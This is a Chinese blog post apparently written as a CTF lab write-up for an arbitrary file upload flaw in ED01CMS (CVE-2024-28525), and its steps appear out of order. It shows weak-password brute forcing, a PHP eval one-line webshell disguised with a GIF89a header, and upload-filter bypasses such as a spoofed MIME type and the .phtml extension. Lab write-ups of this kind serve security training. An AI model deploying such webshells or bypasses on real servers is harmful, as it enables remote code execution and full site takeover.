【春秋云镜】CVE-2024-28525 ED01CMSv20240505存在任意文件上传漏洞解题思路(1)_zyxel-ztp-rce-(cve-2022-30525).json-CSDN博客

本文链接：https://blog.csdn.net/2401_83739503/article/details/137732437

4、执行恶意文件：一旦恶意文件被成功上传并绕过了服务器的所有验证机制，尝试执行该文件。这通常需要通过某种方式触发文件的执行，如通过访问一个特定的URL地址。

5、利用上传的恶意文件进行攻击：上传并执行恶意文件后，进行各种攻击，如提权、数据泄露、拒绝服务攻击、网站篡改等。

6、拿flag！

1、信息收集：

识别目标系统的网络架构、服务和应用版本信息、开放端口、运行的服务以及可能的安全漏洞，这些都有相应的工具，一般对网络安全渗透测试有兴趣的都有，没有的话私聊，没看美女的话我应该回复的很及时。

打开页面，看了下没有上传点，那这有登录框，注册框，那注册一个进入找一下上传点

尝试注册了好多次都注册不了，返回提示数据库中没有这个字段，这。。。

那我试试口令爆破吧，看看是不是弱账户弱密码，掏出工具burpsuit，下面连接是有如何使用burpsuit爆破的，我在这就不演示了

【春秋云镜】CVE-2022-25578 taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码解题思路-CSDN博客

爆破得出admin/admin是管理员账户，直接登录

2、寻找上传点

发现一个可以上传文件的位置，并且权限还是管理员

右键查看页面源代码，发现是php语言，那这样，我们那开始编写shell脚本吧

一句话木马cmd.jpg：

GIF89a
<?php eval($_POST['cmd']); ?>
//它执行了一个名为 eval 的PHP函数，该函数执行由 $_POST['cmd'] 变量传入的字符串作为PHP代码。这意味着，如果攻击者能够发送HTTP POST请求并控制 cmd 参数的值，他们就能在服务器上执行任意PHP代码。这可以导致严重的安全问题，包括但不限于数据泄露、未授权访问和服务器被完全接管。

3、绕过验证

上传木马，burp抓包

####文件上传####
<?php @eval($\_POST[w]);?>
绕过上传方法：

前端校验：等同于没有校验，直接修改前端。

服务端校验：
文件类型：image/jpeg

内容：校验上传内容有没有图片头 GIF89a

校验上传内容含不含木马特征
检验是否有 <?
绕过方法：

校验你的后缀是否是php
用phtml就可以绕过去了

修改文件后缀为php，想办法访问我们的cmd.php